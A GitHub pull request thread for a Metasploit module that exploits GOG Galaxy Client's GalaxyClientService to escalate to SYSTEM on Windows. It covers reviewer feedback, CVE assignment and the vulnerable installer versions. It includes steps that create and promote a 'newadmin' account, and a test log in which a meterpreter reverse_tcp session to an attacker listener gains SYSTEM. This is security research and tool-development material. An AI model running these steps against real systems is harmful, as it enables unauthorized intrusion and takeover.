Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

GOG Galaxy Client Privilege Escalation Module #13444

Merged
merged 3 commits into from Jun 15, 2020

Conversation

jtesta
Copy link
Contributor

@jtesta jtesta commented May 13, 2020

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

Please ensure you are submitting from a unique branch in your repository to master in Rapid7's.

Verification

List the steps needed to make sure this thing works

  • Gain shell on Windows host with GOG Galaxy Client v2.0.12 or earlier.
  • run post/windows/escalate/gog_galaxyclientservice_privesc
  • Verify that a user named newadmin was created.
  • Optionally, run again with ARGS="localgroup Administrators newadmin /add" to promote to local administrator.

@bcoles
Copy link
Contributor

bcoles commented May 13, 2020

This should probably be implemented as a exploit/windows/local module to retrieve a new session, rather than requiring the operator to manually specify commands. Local exploit modules permit the user to specify a ARCH_CMD payload with an arbitrary command if they wish.

@bwatters-r7 bwatters-r7 added module needs-docs needs-linting The module needs additional work to pass our automated linting rules labels May 13, 2020
@label-actions
Copy link

label-actions bot commented May 13, 2020

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@bwatters-r7 bwatters-r7 removed the needs-linting The module needs additional work to pass our automated linting rules label May 13, 2020
@rapid7 rapid7 deleted a comment from label-actions bot May 13, 2020
@gwillcox-r7
Copy link
Contributor

@jtesta Hello Joe, have you gotten a CVE for this bug yet? If not @todb-r7 might be able to assist.

@jtesta
Copy link
Contributor Author

jtesta commented May 13, 2020 via email

@todb-r7
Copy link

todb-r7 commented May 13, 2020

Hi Grant. Nope, I haven't gotten a CVE yet. Aside from @todb-r7, how would one go about reserving one nowadays?

So, I'm probably the easiest path for Metasploit stuff like this, but you're welcome to do it yourself at the CVE Request form, here: https://cveform.mitre.org/ (Doesn't look like GOG is a CNA).

Let me know if you want to do it yourself, or let me. I'm happy to assign one of R7's research CVEs to this (with you listed as the discoverer, of course).

As an aside, I saw in your writeup a screenshot of the private key you extracted from the binary. Would you mind contributing that to https://github.com/rapid7/ssh-badkeys ? That's basically the naughty step for misbehaving keys.

@jtesta
Copy link
Contributor Author

jtesta commented May 13, 2020 via email

@todb-r7
Copy link

todb-r7 commented May 13, 2020

Would it still be appropriate to submit it to the ssh-badkeys repo in that case?

Oh maybe https://github.com/BenBE/kompromat is more appropriate for this. If you like.

Editing now to include the CVE!

Freshly reserved! Not populated yet!
@todb-r7
Copy link

todb-r7 commented May 13, 2020

@jtesta I'm just a fan of over-sharing compromised keys, just in case they show up somewhere else. Distributed private keys should be double-tap killed.

@jtesta
Copy link
Contributor Author

jtesta commented May 18, 2020

As @bcoles suggested, I moved the module into exploit/windows/local.

Documentation has been added as well.

Does this PR need anything else?

@bcoles bcoles added docs and removed needs-docs labels May 19, 2020
@gwillcox-r7
Copy link
Contributor

@jtesta Your documentation needs proper instructions on where to get the vulnerable versions as well as how to set them up. Also your section ## Scenarios should also list which version and system you tested this on.

You can refer to @h00die's PR at https://github.com/rapid7/metasploit-framework/pull/13470/files for an example of how this should be formatted. Note the installation steps he provides, as well as the additional ### Pi-Hole 4.3 with AdminLTE 4.3 on Ubuntu 18.04 section he has under ## Scenarios. In your case you would need to make this something like ### GOG Galaxy version 1.2.64.2 on Windows 10 1909 x64.

For your installer steps I took the liberty of finding some appropriate downloads from GOG Galaxy's official servers. They are:

https://cdn.gog.com/open/galaxy/client/setup_galaxy_1.2.64.2.exe
https://cdn.gog.com/open/galaxy/client/setup_galaxy_2.0.12.48.exe

Given that the version number is a 4 part number, not a 3 part number, I would recommend updating your documentation to be more specific as to the versions affected. For example I couldn't find 1.2.64.0, nor could I find 1.2.64.1, so this is something that maybe should be considered in your explanation, whereby you could just say something like versions 1.2.64.x and prior were affected.

Otherwise looks good from an initial glance through, but will need to dive into this one deeper to check for additional issues.

@bcoles
Copy link
Contributor

bcoles commented May 19, 2020

Does this PR need anything else?

Please update the module to use Metasploit payloads rather than commands specified in module options. This will also require specifying the appropriate arch and platform in the module info Hash.

Optionally, you can also add a second target with ARCH_CMD for using Windows command payloads, such as powershell commands. Although there's no existing Windows local exploits which do this, there's plenty of other examples from which you can steal code, such as freeswitch_event_socket_cmd_exec, which offers multiple targets.

@space-r7 space-r7 self-assigned this Jun 8, 2020
@space-r7
Copy link
Contributor

space-r7 commented Jun 8, 2020

Hi @jtesta, I really enjoyed your writeup on this vulnerability! Just installed the client on a Windows machine, tested out your module, and it works great. As for making the suggested changes, will you have any bandwidth anytime soon? If not, I'd be happy to assist and get your module across the finish line. Thanks!

@jtesta
Copy link
Contributor Author

jtesta commented Jun 9, 2020

@space-r7 Glad you enjoyed the write-up!

Unfortunately, I'm busy at the moment, but if you were able to help brush this up for merging, that would be great!

@space-r7
Copy link
Contributor

@space-r7 Glad you enjoyed the write-up!

Unfortunately, I'm busy at the moment, but if you were able to help brush this up for merging, that would be great!

Can do! Thanks so much!

@space-r7
Copy link
Contributor

Didn't have much luck with adding an ARCH_CMD target, so the module only uses the dropper method. Tested on Galaxy Client v1.2.66.64:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (201283 bytes) to 192.168.37.131
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.131:50855) at 2020-06-15 08:35:15 -0500

meterpreter > getuid
Server username: DESKTOP-AQT4EG1\space
meterpreter > sysinfo
Computer        : DESKTOP-AQT4EG1
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 15
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/gog_galaxyclientservice_privesc 
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set session 1
session => 1
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > check
[*] The target appears to be vulnerable. Vulnerable version found: 1.2.66.64
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Starting GalaxyClientService...
[*] Service started successfully.
[*] Connecting to service...
[*] Writing C:\Users\space\AppData\Local\Temp\mqslPXvWyu.exe to target
[*] Connected to service.  Sending payload...
[*] Sending stage (201283 bytes) to 192.168.37.131
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.131:50857) at 2020-06-15 08:35:59 -0500
[+] Command executed successfully!

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-AQT4EG1
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 15
Meterpreter     : x64/windows

space-r7 added a commit that referenced this pull request Jun 15, 2020
@space-r7 space-r7 merged commit 5508bda into rapid7:master Jun 15, 2020
@space-r7
Copy link
Contributor

space-r7 commented Jun 15, 2020

Release Notes

The GOG GalaxyClientService Privilege Escalation module that targets vulnerable versions of the gaming software known as GOG Galaxy Client. The GalaxyClientService runs as system and listens locally on port 9978 for commands. A user can connect to this service and issue commands to run, allowing for escalation to SYSTEM.

@jtesta
Copy link
Contributor Author

jtesta commented Jun 15, 2020

@space-r7 Thank you so much for taking the lead on this and getting it merged!

@space-r7
Copy link
Contributor

@space-r7 Thank you so much for taking the lead on this and getting it merged!

No problem! Thank you for the module!

@adfoster-r7 adfoster-r7 added the rn-modules release notes for new or majorly enhanced modules label Jun 19, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

7 participants